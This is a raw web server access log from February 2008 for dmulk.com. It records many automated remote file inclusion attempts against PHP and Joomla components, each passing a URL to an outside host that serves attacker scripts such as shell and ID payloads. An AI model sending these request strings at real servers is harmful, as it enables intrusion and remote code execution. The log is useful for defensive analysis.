80.66.6.21 - - [25/Feb/2008:09:50:35 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.66.6.21 - - [25/Feb/2008:09:50:35 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:09:50:50 -0800] "GET //Neos_Chronos/header.php?base_folder=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.252.59 - - [25/Feb/2008:09:51:02 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
62.75.252.59 - - [25/Feb/2008:09:51:04 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
87.230.84.213 - - [25/Feb/2008:09:51:05 -0800] "GET /logs/access.log//admin/oneadmin/newspublish/include.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.84.213 - - [25/Feb/2008:09:51:05 -0800] "GET /logs/access.log//admin/oneadmin/newspublish/include.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.84.213 - - [25/Feb/2008:09:51:06 -0800] "GET //admin/oneadmin/newspublish/include.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.84.213 - - [25/Feb/2008:09:51:07 -0800] "GET /logs//admin/oneadmin/newspublish/include.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.84.213 - - [25/Feb/2008:09:51:12 -0800] "GET //admin/oneadmin/newspublish/include.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.84.213 - - [25/Feb/2008:09:51:17 -0800] "GET /logs//admin/oneadmin/newspublish/include.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
198.170.113.230 - - [25/Feb/2008:09:51:50 -0800] "GET /ipblock.inc.php?path_escape=http://www.koreandentists.org/bbs//data1/alba.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.113.230 - - [25/Feb/2008:09:51:51 -0800] "GET /ipblock.inc.php?path_escape=http://www.koreandentists.org/bbs//data1/alba.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.113.230 - - [25/Feb/2008:09:51:51 -0800] "GET /ipblock.inc.php?path_escape=http://www.koreandentists.org/bbs//data1/alba.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:09:52:24 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
139.174.4.11 - - [25/Feb/2008:09:52:29 -0800] "GET //starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
139.174.4.11 - - [25/Feb/2008:09:52:33 -0800] "GET /logs//starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
139.174.4.11 - - [25/Feb/2008:09:52:39 -0800] "GET /logs/access_080107.log//starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
139.174.4.11 - - [25/Feb/2008:09:52:39 -0800] "GET /logs/access_080120.log//starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.202 - - [25/Feb/2008:09:52:54 -0800] "GET /logs/access.log//admin/oneadmin/newspublish/include.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.202 - - [25/Feb/2008:09:52:54 -0800] "GET //admin/oneadmin/newspublish/include.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.202 - - [25/Feb/2008:09:52:55 -0800] "GET /logs//admin/oneadmin/newspublish/include.php?path[docroot]=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:09:53:37 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:09:53:37 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:09:53:37 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:09:53:38 -0800] "GET //?includes/config-global.php?_SESSION[docroot_path]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:09:53:39 -0800] "GET /logs//?includes/config-global.php?_SESSION[docroot_path]=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 200 36121 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.30.216.97 - - [25/Feb/2008:09:53:48 -0800] "GET /logs/access_080201.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:09:54:25 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:09:54:25 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:09:54:25 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
139.174.4.11 - - [25/Feb/2008:09:54:31 -0800] "GET /logs/access_080106.log//starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:09:54:31 -0800] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mey_linda2000/autojoin/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:09:54:31 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mey_linda2000/autojoin/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:09:54:32 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/mey_linda2000/autojoin/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.170.113.230 - - [25/Feb/2008:09:54:32 -0800] "GET /convert/mvcw.php?vwar_root=http://www.koreandentists.org/bbs//data1/alba.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
82.146.33.210 - - [25/Feb/2008:09:54:45 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
82.146.33.210 - - [25/Feb/2008:09:54:45 -0800] "GET /logs/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
198.170.113.230 - - [25/Feb/2008:09:55:15 -0800] "GET /convert/mvcw.php?vwar_root=http://www.koreandentists.org/bbs//data1/alba.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.113.230 - - [25/Feb/2008:09:55:24 -0800] "GET /convert/mvcw.php?vwar_root=http://www.koreandentists.org/bbs//data1/alba.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:09:55:24 -0800] "GET /logs/access_071202.log/index.php?mosConfig_absolute_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:09:55:25 -0800] "GET /index.php?mosConfig_absolute_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:09:55:25 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:09:55:35 -0800] "GET /logs/access_080201.log/index.php?mosConfig_absolute_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:09:56:08 -0800] "GET /logs/access.log//oneadmin/config.php?path[docroot]=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:09:56:08 -0800] "GET //oneadmin/config.php?path[docroot]=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:09:56:08 -0800] "GET /logs//oneadmin/config.php?path[docroot]=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:09:56:13 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:09:56:13 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
222.135.109.228 - - [25/Feb/2008:09:56:27 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 0 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [25/Feb/2008:09:56:27 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [25/Feb/2008:09:56:28 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:09:56:35 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.75.28 - - [25/Feb/2008:09:56:38 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://netbr.org/documents/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.75.28 - - [25/Feb/2008:09:56:38 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://netbr.org/documents/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:09:56:39 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [25/Feb/2008:09:57:32 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
222.135.109.228 - - [25/Feb/2008:09:57:40 -0800] "GET /logs/access_071222.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [25/Feb/2008:09:57:41 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 0 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [25/Feb/2008:09:57:42 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 0 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.200.33 - - [25/Feb/2008:09:57:56 -0800] "GET //starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
66.7.200.33 - - [25/Feb/2008:09:58:01 -0800] "GET /logs//starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
66.7.200.33 - - [25/Feb/2008:09:58:06 -0800] "GET /logs/access_080107.log//starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
66.7.200.33 - - [25/Feb/2008:09:58:27 -0800] "GET /logs/access_080106.log//starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:09:58:54 -0800] "GET //?index.php?mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 200 3094 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:09:58:54 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 200 36121 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:09:59:14 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:09:59:21 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:09:59:21 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:09:59:21 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:09:59:22 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:09:59:22 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:09:59:49 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.116.173.131 - - [25/Feb/2008:10:00:04 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [25/Feb/2008:10:00:04 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [25/Feb/2008:10:00:05 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [25/Feb/2008:10:00:05 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [25/Feb/2008:10:00:26 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [25/Feb/2008:10:00:27 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [25/Feb/2008:10:00:27 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.116.173.131 - - [25/Feb/2008:10:00:29 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.112.178 - - [25/Feb/2008:10:01:06 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:10:01:08 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:10:01:11 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:10:01:19 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:10:01:24 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:10:01:27 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:10:01:28 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:10:01:28 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:02:21 -0800] "GET /logs/access_071230.log/?mosConfig_absolute_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:02:22 -0800] "GET /?mosConfig_absolute_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 200 3094 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:02:22 -0800] "GET /logs/?mosConfig_absolute_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 200 36116 "-" "libwww-perl/5.803" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:10:02:37 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:10:02:38 -0800] "GET /admin/classes/TplLoad.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:02:41 -0800] "GET /logs/access_080201.log/?mosConfig_live_site=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:02:41 -0800] "GET /?mosConfig_live_site=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 200 3094 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:02:42 -0800] "GET /logs/?mosConfig_live_site=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 200 36116 "-" "libwww-perl/5.803" "www.dmulk.com"
222.135.109.228 - - [25/Feb/2008:10:02:45 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:03:43 -0800] "GET /logs/access_071230.log/?mosConfig_absolute_path=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:03:44 -0800] "GET /?mosConfig_absolute_path=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 200 3094 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:03:44 -0800] "GET /logs/?mosConfig_absolute_path=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 200 36116 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:03:47 -0800] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:03:47 -0800] "GET //modules/My_eGallery/index.php?basepath=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:03:48 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.161.97.124 - - [25/Feb/2008:10:03:49 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
